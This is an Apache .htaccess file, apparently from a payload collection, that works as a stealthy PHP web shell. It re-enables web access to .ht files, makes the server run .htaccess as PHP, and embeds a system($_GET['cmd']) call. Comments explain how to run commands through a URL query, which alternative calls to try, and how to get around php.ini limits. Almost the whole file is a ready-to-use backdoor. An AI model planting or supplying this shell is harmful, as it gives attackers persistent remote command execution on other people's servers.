# htaccess backdoor shell # this is relatively stealthy compared to a typical webshell # overriding deny rule # making htaccess accessible from the internet # without this you'll get a HTTP 403 <Files ~ "^\.ht"> Require all granted Order allow,deny Allow from all </Files> # Make the server treat .htaccess file as .php file AddType application/x-httpd-php .htaccess # <?php system($_GET['cmd']); ?> # To execute commands you would navigate to: # http://vulnerable.com/.htaccess?cmd=YourCommand # If system(); isnt working then try other syscalls # e.g. passthru(); shell_exec(); etc # If you still cant execute syscalls, try bypassing php.ini via htaccess